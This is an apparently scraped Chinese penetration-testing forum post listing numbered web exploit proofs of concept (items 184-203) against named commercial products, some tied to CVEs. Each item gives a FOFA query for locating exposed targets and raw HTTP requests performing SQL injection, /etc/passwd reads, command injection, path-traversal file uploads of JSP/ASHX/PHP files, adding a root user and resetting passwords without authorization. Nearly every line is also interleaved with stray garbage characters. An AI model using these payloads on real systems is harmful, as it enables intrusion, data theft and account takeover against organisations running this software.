+ I2 v4 {- }! ]4 J5 xHost: your-ip* ^/ X7 d) n5 X
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36' G" m9 O% f7 M9 M4 E
Accept-Charset: utf-8
" E* B$ H& E1 `7 r% k  DAccept-Encoding: gzip, deflate
7 V" b* w: O+ z; C$ EConnection: close: Q! Z' }4 t7 S, M7 `( B( r

2 E) G1 z+ O9 z( X/ t7 q
0 E6 D# h# l3 R# t184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
& @$ p# ], i( s0 k" ^* Q2 qFOFA:server="SunFull-Webs"
8 j* B8 Y  a, `. `- |5 b1 y' `POST /soap/AddUser HTTP/1.1
3 g4 q, q+ D& kHost: your-ip
2 U' W2 a8 e" GAccept-Encoding: gzip, deflate1 o+ B( N. o/ k+ U4 L9 P1 A, ]' z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
1 G) {: @& B( jAccept: application/xml, text/xml, */*; q=0.01
5 \: f, I4 n4 W& Q7 e3 [# v' QContent-Type: text/xml; charset=utf-8
0 n2 ?/ `8 s& ^2 m7 C& B4 cAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% U0 [- n- y' p; y+ _" P9 X
X-Requested-With: XMLHttpRequest
" ]7 W: `  p6 A' }' h' _9 \9 ]5 p2 e& P" q9 v1 _& S0 f

  L+ \4 d: e  }, ]+ b) c; Jinsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')1 U7 o6 A7 p6 j8 P

1 I/ j/ d/ `" L6 h
) g0 `9 W; T% O' V9 N185. 瑞友天翼应用虚拟化系统SQL注入& L- C2 D  s9 `5 N& q
version < 7.0.5.1
/ m# N/ m' a; O1 g" LFOFA:app="REALOR-天翼应用虚拟化系统"
% l" X) Q) T! u9 U+ V9 L1 _GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
; m4 Y# v2 j3 w/ bHost: host  Y4 X1 B9 w! l# D

9 a* Y1 P  ?' j- q/ U3 C# l' R* K$ }; W- r0 o5 v+ i/ b
186. F-logic DataCube3 SQL注入
; t& s0 o! E7 d8 N2 g  i& pCVE-2024-31750
  E$ `- B* [# w+ JF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
- f8 M8 f6 d& t7 l4 H7 R% @FOFA:title=="DataCube3"- k6 @7 ]  [+ }- U
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
+ O7 P9 T2 u7 V  ~8 N2 ~Host: your-ip
/ Z$ B% A5 }/ o5 @- dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
: f  T; K- D. ^1 `9 YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.81 q& T5 g8 l$ {; ?0 V
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 h; k. h2 R3 W9 [. g1 {2 B& T! U; tAccept-Encoding: gzip, deflate
3 x9 S* I6 r% s+ q  [$ JConnection: close
3 E9 }$ h5 j" XContent-Type: application/x-www-form-urlencoded" `! ?  H. x9 ^- Y+ k; t7 P

9 z. j3 @- A  J8 w+ a" _1 U& E: Wreq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=14503 h- a' j" |% I
. q8 N  j& a# H( Q5 u. ]/ @
" Q' U+ C) Z' ?; o
187. Mura CMS processAsyncObject SQL注入2 y0 n2 g# {6 J. _$ x  t% h
CVE-2024-32640' B8 D- J; j; r* n
FOFA:"Mura CMS"$ i5 ]5 h! F  Z5 d  p/ I' e7 l
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1/ F# E  h! X, v; a3 l. D$ _% k
Host: your-ip1 R" F3 Y0 `3 R$ I8 t
Content-Type: application/x-www-form-urlencoded
. q3 A* A, A4 z
; |$ a  ^* }0 {& |+ R2 y3 G' Y2 L) _# r( R# E# H9 u( h* e. a0 y: \
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
$ Q1 ]' c$ t8 l8 V8 M7 X' P( n# p
' k1 A5 F- R3 n: d7 f
1 h4 j5 z- \7 z3 b188. 叁体-佳会视频会议 attachment 任意文件读取
+ N* s9 q4 L% H1 Uversion <= 3.9.7
' k" p" g$ @1 @( TFOFA:body="/system/get_rtc_user_defined_info?site_id". x* a1 D5 b/ z3 m; z
GET /attachment?file=/etc/passwd HTTP/1.1* z, d5 |/ ?1 t8 @2 F
Host: your-ip" S5 s6 _3 M. P0 }7 @* y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36* P8 e" y) b* J8 }/ R! g* w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ T6 x. |$ F) k1 J( N
Accept-Encoding: gzip, deflate
( T# ~- K% f3 F1 o. sAccept-Language: zh-CN,zh;q=0.9,en;q=0.85 n$ S: t1 T) y" X; I, |/ y9 S
Connection: close
- C) q! Z6 [" C& i
. ?" Q1 M. r$ A3 l7 ?- v; k8 E/ E% q: T* U
189. 蓝网科技临床浏览系统 deleteStudy SQL注入+ O+ s; U' q8 D5 h/ r
FOFA:app="LANWON-临床浏览系统"
. A( _3 W# y7 i. D) ]8 b  ?/ ]GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
" P: @, {2 }" z% P! UHost: your-ip. N+ m/ N: n$ z( Z4 {
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36% Q0 f! x9 X. S6 J, {! M
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 {) a/ M/ q! r; l
Accept-Encoding: gzip, deflate* \! b1 x3 [. K
Accept-Language: zh-CN,zh;q=0.9) k: Y' Z# }, C( N3 U) J& V
Connection: close, b1 `% O+ a- ?4 ~; z
; g% C' L" }% ~4 _" W8 X: @% t& w

' J7 y3 ^0 {7 _9 Y! R4 V5 `/ \3 S% A190. 短视频矩阵营销系统 poihuoqu 任意文件读取- e. N$ {, r' k( _$ R
FOFA:title=="短视频矩阵营销系统"7 U8 Q2 `& q, h8 U6 _) z
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
) Z5 }8 i' {& p( P2 [Host: your-ip0 A( f) t& t: n8 [! x7 r& i; ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.364 f. E1 ]) p+ }, a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.92 G+ M) S8 R& C/ g3 ]% S
Content-Type: application/x-www-form-urlencoded
6 [" A, p1 y+ \+ `& v. ZAccept-Encoding: gzip, deflate% j3 Y* U! f8 M) ^- q' z+ q, @' s
Accept-Language: zh-CN,zh;q=0.97 m- ~+ A8 j4 P, L  T

. }- O9 W! K! c9 gpoi=file:///etc/passwd
7 u! D- l9 U1 t4 N% D$ C! z# f; E$ C1 k! Z( Y3 v7 S

; U3 c6 U8 [# e  [0 {% ?191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
& Y6 A7 Z$ f2 `) J* l5 T3 Q6 ~FOFA:body="/CDGServer3/index.jsp"6 q" F) s1 I( n& P$ d  ]
POST /CDGServer3/js/../NavigationAjax HTTP/1.13 P: Z; ~( s- c* W3 k3 m$ X8 n& T# V, g
Host: your-ip  h& o2 c( w) h, s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 z" {9 S! r0 M/ T2 qContent-Type: application/x-www-form-urlencoded7 X& _" H; ~* r% L4 K' T
& t# k; m9 E7 C4 s/ u2 I1 A
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=& q, i- Z' Y2 ^; a  {, H

8 l0 j7 [* g6 m2 U* ^& D1 d% V# B4 W% z/ ^2 v2 D
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
. f: ?$ G9 I; v* p  ~5 N- S. eFOFA:title="用户登录_富通天下外贸ERP"
/ M, Y9 G( _+ u& L& R. ?1 d- nPOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
0 I$ P( r2 H# J7 Q+ q% wHost: your-ip; D5 T0 g9 h) h8 H4 V  d& v0 H2 ~
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
" W$ i6 L" h4 iContent-Type: application/x-www-form-urlencoded
/ D7 C" t2 }; {! p1 ]$ R1 H/ F6 U. o" B  W# ?/ j
2 {% `2 p* I: Q' t& D( R
<% @ webhandler language="C#" class="AverageHandler" %>7 Y( {. ?7 S5 r
using System;- p1 X  ~- @3 e4 `
using System.Web;
- S8 W- p$ j. l/ ]/ wpublic class AverageHandler : IHttpHandler
% o: B( V' s- J; \$ i( P8 z) y{( |1 O: }' R& f- S8 s# c' E
public bool IsReusable
6 A- E2 `% h/ r- j5 P" y3 h{ get { return true; } }
$ \( ]1 K. m4 n# |9 Q) M8 S, i6 Wpublic void ProcessRequest(HttpContext ctx)- k" p8 b$ Z% G" }5 ^
{
( g& d( b* H7 y8 ?% E6 _ctx.Response.Write("test");
) o( W, n) U; R+ T* F}
, k7 y' |/ n$ w}; }2 K2 c( @1 W1 o. }+ c3 b
4 u+ j- x) ]) F% L
8 a' T% f& d3 {7 [
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行2 v" T0 U" j' H) B
FOFA:body="山石云鉴主机安全管理系统"
* z8 [5 c5 r! H/ M; iGET /master/ajaxActions/getTokenAction.php HTTP/1.1
3 w/ w  y* G$ K! s2 C* |! R. K7 XHost:' c' W; Y7 d. I% h; }/ s
Cookie: PHPSESSID=2333333333333;$ ?' G/ K& h" E9 F/ x  R
Content-Type: application/x-www-form-urlencoded
3 P" ?* F9 H  GUser-Agent: Mozilla/5.0
+ l" D8 G8 M  R5 d% [# d  t0 S+ C1 d7 z# [
* K  X, O7 H0 u8 Y* x7 z
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1' M" p$ M5 K! C1 T/ n0 C
Host:% R/ x" \; x3 t  v. Z, Q4 }; f
User-Agent: Mozilla/5.0
* i  o$ P# E; Y/ k+ M* CAccept-Encoding: gzip, deflate% |- J2 M; V8 O
Accept: */*
) z0 A! I+ L$ t1 Z& @& b4 ]. A5 mConnection: close) b! k9 D8 z. H+ A& L0 @1 ~5 e# T% L5 b
Cookie: PHPSESSID=2333333333333;( z( a" g* W7 [. U( u
Content-Type: application/x-www-form-urlencoded, b+ T3 n5 T2 j/ A, i3 n% A: R
Content-Length: 84% f+ [9 f/ [- [4 m+ K2 H, p4 D4 o

/ ^- p6 o: X, y( M3 lparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
- T* \1 r9 j: u" q: s! m& v" U: m& R; q9 c  A

% T  J+ T/ p! b! T  J6 H  b9 vGET /master/img/config HTTP/1.1
( a' B" [+ W) q$ z- KHost:
0 q+ {: g5 d9 F' ]User-Agent: Mozilla/5.04 I+ \1 w& O0 U! K- F. y

: n* d) G$ i# a+ o* T
8 Y. ]' @$ h- h194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传' Y/ ?3 Z- c- [4 P
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
- d2 g/ e7 }  n6 ?, U* j' V, {  v* F2 H' D2 K1 @
POST /servlet/uploadAttachmentServlet HTTP/1.1" Z5 @! T5 B" B& N
Host: host- C' ?* d" d2 ]! f  |( h# v$ Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36& w( K( t9 @' x: X' U( F% D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8/ _: E/ L3 d* `4 E
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 w+ Y6 N; N. a( }8 E1 J9 ~2 f* O
Accept-Encoding: gzip, deflate
* c/ d8 X- j' m* I- D- ~Connection: close3 p8 h( C! c6 j4 s7 G0 r* C
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
1 E- _9 f6 j( Z$ v( @4 y, y' i------WebKitFormBoundaryKNt0t4vBe8cX9rZk
1 l# ^8 t3 f% A' {9 {/ q
5 F  q; W; G* e+ GContent-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
  r# W' A* n: X  IContent-Type: text/plain
  t0 ~2 d4 r9 U/ t9 K) _2 r" D<% out.println("hello");%>
' ?4 j8 u  _0 |: Y$ R  n3 h------WebKitFormBoundaryKNt0t4vBe8cX9rZk
" m$ S6 Q7 G9 u' f2 ], i4 NContent-Disposition: form-data; name="json"% F8 S6 N" q( R( C% g+ S% ^* k
{"iq":{"query":{"UpdateType":"mail"}}}1 ?9 E' c5 K" e# f
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
$ @. i& X- |6 y4 w+ e% X5 p
1 m# t: i% J) x( e. U# Q4 B
4 q4 P1 k: E& W: J; `0 r# \195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
  R! Q% r8 @* b$ n" f# DFOFA:title=="飞鱼星企业级智能上网行为管理系统* L$ d7 s7 x# k3 c, `3 S! h" M" N
POST /send_order.cgi?parameter=operation HTTP/1.1/ |* D( B) K5 A3 j+ z; r
Host: 127.0.0.1
5 Y9 X- Y5 w) \1 a! }Pragma: no-cache
& X* j+ @1 F% S7 G6 w5 i. {& ]Cache-Control: no-cache2 V) e# c- f" k. Z* e' }5 i0 ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.362 |, s. t! t: s. n; H  n6 u9 K
Accept: */*6 y/ Z: b; F# ~+ V
Accept-Encoding: gzip, deflate- }- }* k5 |0 i8 j
Accept-Language: zh-CN,zh;q=0.9
, N, R: e1 b/ Z: GConnection: close' S' N1 u- V+ E7 w1 ?
Content-Type: application/x-www-form-urlencoded
( g# _$ k* {5 rContent-Length: 68  F, z7 U  j; z( A% |# d

) f( {! F4 L) H- l2 W8 X, p5 V{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
, z* {: K7 u3 V9 A/ D" q3 n4 w
+ Q/ G# F9 p- E! }: l" m& `* l1 ?" I9 P
196. 河南省风速科技统一认证平台密码重置
- e! A+ V' U5 |9 R* S2 dFOFA:body="/cas/themes/zbvc/js/jquery.min.js"
, n3 q! m7 }7 M& A' a' v' X# ]5 }, [POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
; }' q7 c, z+ T0 }0 T+ }( v1 i) @User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
/ c# i! W( _: n9 {$ V, l0 p- BContent-Type: application/json;charset=UTF-8
5 C: \& T. {% R7 ]1 k6 y! p. M% DX-Requested-With: XMLHttpRequest6 l+ B* j% O" c7 r: |) k9 {
Host:  m  R  M  A& j, K  [
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2) m8 ]+ d  p+ \" r/ x1 u% N
Content-Length: 45  U1 M( F- i6 R, ?* `
Connection: close
+ G- e6 O" M- k* n2 }$ M1 i
$ k7 u5 w( E7 \# `{"xgh":"test","newPass":"test666","email":""}; q& r2 o% ^5 y& c
2 t6 `  n8 m2 L
5 @3 g! Y+ D; e1 Q( r& S
2 d5 E, E& R0 ^1 H0 Q  `* u
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
* K- [7 _, d3 C* E" f, G: NFOFA:app="浙大恩特客户资源管理系统"
& B4 g% U* u5 M: s; {GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1/ V' C% i* n  O$ K1 z' K. E6 `
Host:
" O# \! N7 h* z1 tUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
" p  ~, b" M: GAccept-Encoding: gzip, deflate
0 L6 o+ w# I0 E) X+ \2 o1 y  C! VConnection: close" p# c: D7 I2 y3 C/ ?: D, J

. z8 b$ F$ R) D% y
6 {8 I" r! z8 M9 l6 f7 t/ o
2 b+ P/ [. i/ T  k198.  阿里云盘 WebDAV 命令注入  M% J+ C: S: H+ k, J! s- A) q
CVE-2024-29640
! `" k0 p" \; z* lGET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
1 d+ v' ^- T9 x$ B) R+ m% R6 tCookie: sysauth=41273cb2cffef0bb5d0653592624cf64( l: q) b9 z6 f
Accept: */*7 r( O: k- V$ V7 ]
Accept-Encoding: gzip, deflate
* {# q6 k" M2 ^- m/ O, mAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.67 m5 R1 e" t. ], r* p
Connection: close! E. M. S0 O3 |3 i' \

; N) m5 h9 t9 Q/ c$ V- |+ f
# h! ?3 D& h" p199. cockpit系统assetsmanager_upload接口 文件上传
% Q$ |# p: @# x, m+ g% K" ^, x0 ^2 D# }
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:7 S6 E, y; `8 Q# |9 P2 T: b
GET /auth/login?to=/ HTTP/1.1
; M6 Y9 y* B) ]/ M, u# S( b' Y( v1 `
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
" j5 |- \5 O- X& D1 A3 D3 K2 \; ]; W0 ~
2.使用刚才上一步获取到的jwt获取cookie:& z) l! V6 e. L; B! \
5 I" E9 ^$ H! N7 }
POST /auth/check HTTP/1.1
. `( s" @% d, p9 Q* TContent-Type: application/json
8 x. ]  B/ e& s4 m  c* \# a% C( {8 s, u6 v- }
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
9 Z4 r( A3 F) _$ W) ~& h) Y# U  j0 }! v; ~/ |- p) h. v
响应:200,返回值:+ I0 v4 @+ }: \7 \" _3 i
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
6 m+ x2 B5 ?, F+ k/ A* x! K* `Fofa:title="Authenticate Please!"& N2 n4 j# \9 P$ A6 l
POST /assetsmanager/upload HTTP/1.1: F- U+ k0 g' q9 |: {' r. Q
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb30 z+ ^! U0 G/ }* S7 p( ?# ?4 [
Cookie: mysession=95524f01e238bf51bb60d77ede3bea924 G5 a% V4 f8 Q/ D" L6 ^

/ w2 m9 I* |; |. g/ ?" u+ V-----------------------------36D28FBc36bd6feE7Fb3
" K1 U# q2 k9 y: H" ~3 mContent-Disposition: form-data; name="files[]"; filename="tttt.php"$ i. B$ M' G0 ^( H1 m  c1 j
Content-Type: text/php3 V9 y) A% w6 d, l3 T. A/ w
8 f3 n) @+ K# u$ D  H! w, J3 R, m. H
<?php echo "tttt";unlink(__FILE__);?>+ T" J2 q/ s- z: D: r# P
-----------------------------36D28FBc36bd6feE7Fb3+ N- A; `( D0 l9 d3 ~; ?
Content-Disposition: form-data; name="folder"9 ?4 ?3 |/ W( C
- T2 s( K( {+ E( V) G$ T6 u, l
-----------------------------36D28FBc36bd6feE7Fb3--2 ^/ K# Y* O# X0 r6 C
' h* T; Z! @" o- q" p% _

; {: R, v3 z6 s, S/storage/uploads/tttt.php
0 S8 |4 U& Y; ^: j  e$ a( v/ ~" W2 \3 h
: B3 i3 s# |+ e2 \+ U6 ?200. SeaCMS海洋影视管理系统dmku SQL注入4 {" w5 H2 y  r* p1 ?; m, ?4 a" n
FOFA:app="海洋CMS"6 f/ O/ |9 p/ A/ s
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
6 R' ]$ G5 _) [" dCookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
( e) r6 u0 [$ W% WUpgrade-Insecure-Requests: 12 S" \6 a5 n. w" ~0 Z2 Y. _- `/ Q
Cache-Control: max-age=04 E8 @9 B% }1 d) @6 Q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" Z: b- F5 j9 v2 O, H5 V$ O% F
Accept-Encoding: gzip, deflate
, R5 \9 t' D# C0 @; M* ZAccept-Language: zh-CN,zh;q=0.9( m0 Y, B% b# W( W# |

- w5 \4 m+ k3 O4 h4 e. T2 R  L% P( Z0 x" L
201. 方正全媒体新闻采编系统 binary SQL注入
. d$ `" |% P1 [! a: y2 \. @- SFOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
/ I+ E! T/ O# c, e8 h9 T9 S  uPOST /newsedit/newsplan/task/binary.do HTTP/1.1+ @+ j* ^+ u# P8 C$ r4 e
Content-Type: application/x-www-form-urlencoded( Q! ?2 E5 d4 f
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
$ {6 }( J' C$ e& s" j* v- c; e" XAccept-Encoding: gzip, deflate
3 a" c) i1 O- RAccept-Language: zh-CN,zh;q=0.93 Q& s" l! X5 C% r% e+ ?2 V) x
Connection: close5 O) E- D$ l# A) v# `$ s" h6 \
9 v0 ?* _2 W1 T% i0 t! t/ ]
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=10 s! k" H! q; ]

/ e2 n; H( N( j! A* }: ?$ G3 c' y, @0 n& X# O0 Z
202. 微擎系统 AccountEdit任意文件上传
. a# c9 t+ M% p$ K& ^FOFA:body="/Widgets/WidgetCollection/"
8 B0 m+ U; }) Q4 _! R' N( V获取__VIEWSTATE和__EVENTVALIDATION值
6 T7 l# Q" o: F, N5 s) UGET /User/AccountEdit.aspx HTTP/1.1
# i& Q: o; ]: _  Q5 ZHost: 滑板人之家
/ ~/ _4 _: \/ {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
8 l1 R& w% Y# O$ b  T; A/ pContent-Length: 06 A/ B5 f, m' v, ^  q6 I4 x* o

) v, G: @1 `6 l0 o6 j
' A+ H. H  N) f1 R% s: J替换__VIEWSTATE和__EVENTVALIDATION值, o; ]5 ]/ o; V0 J1 {9 j! P
POST /User/AccountEdit.aspx HTTP/1.1  b9 G1 d( G" V7 G
Accept-Encoding: gzip, deflate, br
0 }: ^# s& t8 W) U+ Z% E& m5 w/ MContent-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687( w0 `+ e% g/ g+ `

! U! X& H5 z8 Z5 ?, D& O: }-----------------------------786435874t385875938657365873465673587356874 v* [/ i5 ~  V, y. X/ ~1 J
Content-Disposition: form-data; name="__VIEWSTATE": j: \& e9 S! l1 E( z

+ y  R( b+ `" n+ ?__VIEWSTATE
( `( U1 S. x9 O% {% @-----------------------------786435874t38587593865736587346567358735687
* I4 i' l3 A* q% D8 V# fContent-Disposition: form-data; name="__EVENTVALIDATION"! n' [# ^; O, r+ L- i
, ?5 U, P0 g. x$ |( ]
__EVENTVALIDATION0 X8 o, c8 q- t6 z& L1 H: g
-----------------------------786435874t38587593865736587346567358735687* w; j" S2 k* M! o
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"4 L$ E0 o$ z2 O" w" i
Content-Type: text/plain
3 F; k" R5 U+ Y- [' _! g6 O
: J7 U2 o" Z! \+ f* b1 Z  H' @5 uHello World!
3 G* W* b% T) K/ i-----------------------------786435874t38587593865736587346567358735687
- I$ r9 m" U. r" l3 R, w; B7 QContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload": j9 Z( Y" ^! _, U
& O3 h' E3 M5 ~% W  Z
上传图片
( R& c9 |7 |7 s: Q6 K% L: W0 T-----------------------------786435874t38587593865736587346567358735687! T/ E5 o6 a1 ~1 ^& |
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
( |( [  A6 T# |9 a1 x4 ]% }% r' \# s

6 ^) D! V5 W% p$ z. ^0 @-----------------------------786435874t38587593865736587346567358735687
" S8 J2 {& k2 K3 r! IContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
7 ~( D9 n) E% i7 L" c
2 A+ x& Q$ E9 h8 O1 O0 H! M# p2 v9 I) _8 v2 k
-----------------------------786435874t38587593865736587346567358735687--1 B2 z- X( ]; v9 X
0 S! r7 Q# N$ K

+ k7 U( m; V. e# ]/_data/Uploads/1123.txt
5 ?3 \* M/ }! n/ h! y+ j5 ?$ n1 `
203. 红海云EHR PtFjk 文件上传
. L4 O4 D2 W% c( Y9 ZFOFA:body="RedseaPlatform"
* @( L5 I( q1 X% b- j2 G5 z. b7 z2 MPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
3 h9 _3 G; x3 r5 g2 O3 A. bHost: x.x.x.x0 f# P$ q7 d. E& u; l8 S
Accept-Encoding: gzip
$ }+ Y, [- [! F# n) Y6 @0 V" d& VUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
" H( Q  c, |4 [+ ?2 R3 fContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
0 D% |) a! I4 a3 N/ _Content-Length: 210+ @+ O; n9 w' g( u9 |: Q" S3 S5 F

7 i9 g" Z5 r3 d! }------WebKitFormBoundaryt7WbDl1tXogoZys4
; z; _* e% q! b& ?* e, ?+ [2 vContent-Disposition: form-data; name="fj_file"; filename="11.jsp"
2 S! C# A0 s- ?0 M6 }  D/ P! p) mContent-Type:image/jpeg
6 N3 H  m7 y6 m" }1 J5 w$ m
* t( d2 y* t9 c# S/ f- s<% out.print("hello,eHR");%>2 c) N/ l  z! d% `/ o+ x' q
------WebKitFormBoundaryt7WbDl1tXogoZys4--. u* A" K0 F0 q7 ^) }

* [- t* J& e4 w  t0 K/ y# i8 I, H
- C) g* I" L* u: R' @& z$ I; b5 s

% g  n: D' o5 S2 E& O, x+ H  u# p" t. x1 a

9 Z- w9 Z+ F2 ?* z  u



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2